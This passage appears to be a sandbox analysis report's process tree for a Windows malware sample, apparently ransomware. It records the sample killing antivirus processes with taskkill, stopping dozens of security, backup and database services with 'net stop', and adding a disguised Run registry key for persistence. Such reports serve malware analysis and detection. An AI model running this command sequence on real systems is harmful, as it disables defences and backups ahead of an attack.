- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5972
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y2⤵PID:6088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y3⤵PID:6160
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y2⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y3⤵PID:6248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:8132
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Agent" /y2⤵PID:5380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent" /y3⤵PID:6320
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y2⤵PID:2196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y3⤵PID:6276
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y2⤵PID:5916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service" /y3⤵PID:6456
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y2⤵PID:5668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service" /y3⤵PID:6520
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y2⤵PID:6200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service" /y3⤵PID:6532
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y2⤵PID:6288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service" /y3⤵PID:6660
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y2⤵PID:6340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent" /y3⤵PID:6724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y4⤵PID:7404
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y2⤵PID:6396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client" /y3⤵PID:6832
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y2⤵PID:6488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router" /y3⤵PID:6944
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y2⤵PID:6620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service" /y3⤵PID:7092
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y2⤵PID:6696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service" /y3⤵PID:6140
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y2⤵PID:6748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y3⤵PID:6704
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y2⤵PID:6788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y3⤵PID:6740
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y2⤵PID:6872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y3⤵PID:2136
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcronisAgent /y2⤵PID:6928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:6416
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y2⤵PID:6816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery" /y3⤵PID:6448
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y2⤵PID:6560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:7172
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcrSch2Svc /y2⤵PID:6988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:6440
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Antivirus /y2⤵PID:7060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:5000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ARSM /y2⤵PID:7112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:5980
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop DCAgent /y2⤵PID:6552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:7388
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop bedbg /y2⤵PID:6584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:7380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y2⤵PID:6220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6624
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecRPCService /y2⤵PID:6412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:7212
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:7664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecManagementService /y2⤵PID:6784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:6688
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y2⤵PID:6136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:6344
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:6396
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y2⤵PID:6224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:6400
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y2⤵PID:6232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6532
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:7448
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y2⤵PID:6372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:7744
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y2⤵PID:6288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:7828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y2⤵PID:6376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:7440
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y2⤵PID:2348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:7400
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y2⤵PID:7188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:7944
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y2⤵PID:6956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y3⤵PID:7800
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y2⤵PID:6600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:7780
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y2⤵PID:7316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:8064
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y2⤵PID:7356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:8080
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y2⤵PID:7240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:7936
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y2⤵PID:1712
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y2⤵PID:7156
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y2⤵PID:7684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:6776
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6796
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵PID:7488
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y2⤵PID:7868
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y2⤵PID:7816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:7528
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y2⤵PID:7752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:6240
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y2⤵PID:8004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:6252
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y2⤵PID:8168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:5960
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y2⤵PID:8108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:7160
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y2⤵PID:7924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:7740
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y2⤵PID:7620
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:7560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:6732
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y2⤵PID:7504
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y2⤵PID:7464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:6480
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:8112
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y2⤵PID:6856
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6620
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:7120
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y2⤵PID:7040
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y2⤵PID:6672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:7456
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:7136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:6508
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:7156
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:7432
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y2⤵PID:6920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:7944
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:7220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7212
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:7492
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y2⤵PID:7392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:7340
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y2⤵PID:6420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:7508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y4⤵PID:6388
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6312
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:7400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:7976
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y2⤵PID:6760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y3⤵PID:6396
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:7804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:7608
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:7372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:5316
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:6548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:7844
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7420
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y2⤵PID:7928
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y2⤵PID:7776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:6380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y2⤵PID:7724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:7664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:6820
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y2⤵PID:6764
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y2⤵PID:8156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6276
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:6312
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y2⤵PID:7824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:7240
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y2⤵PID:6684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:6512
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y2⤵PID:6156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:7852
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y2⤵PID:7944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:7204
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y2⤵PID:6260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:6996
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:6580
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:6524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:6708
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:7492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:7844
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:7916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:7144
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7660
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:6052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:7728
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:7180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:6868
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y2⤵PID:6152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:6224
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y2⤵PID:5380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7372
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:6824
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7600
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:7336
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y2⤵PID:6576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:6408
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y2⤵PID:6692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7504
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:5828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y2⤵PID:7484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:7936
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6908
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y2⤵PID:8172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:6964
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y2⤵PID:7036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:6588
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y2⤵PID:6392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:6848
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y2⤵PID:1284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:7104
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y2⤵PID:7892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:7496
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y2⤵PID:6352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:7460
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y2⤵PID:6788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:7232
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y2⤵PID:6928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:6208
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y2⤵PID:7172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:6504
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y2⤵PID:5816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:8064
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y2⤵PID:6780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:5188
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y2⤵PID:8000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:7760
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y2⤵PID:7700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:2668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y2⤵PID:7320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:6828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y2⤵PID:6528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:7268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵PID:6288
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6952
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6780
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y2⤵PID:6472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:5364
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:7300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:4060
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y2⤵PID:7296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:7000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y2⤵PID:6344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:8028
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y2⤵PID:7756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y4⤵PID:7120
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:6692
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y2⤵PID:5448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:6632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y4⤵PID:8144
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:6984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:7580
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:7520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:5600
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y2⤵PID:6908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:6744
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y2⤵PID:8116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:8072
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y2⤵PID:7532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:7288
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfefire /y2⤵PID:7496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:8180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\eiavW.exe" /f2⤵PID:6820
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\eiavW.exe" /f3⤵
- Adds Run key to start application
PID:7620 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵PID:6648
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:6324
-
-
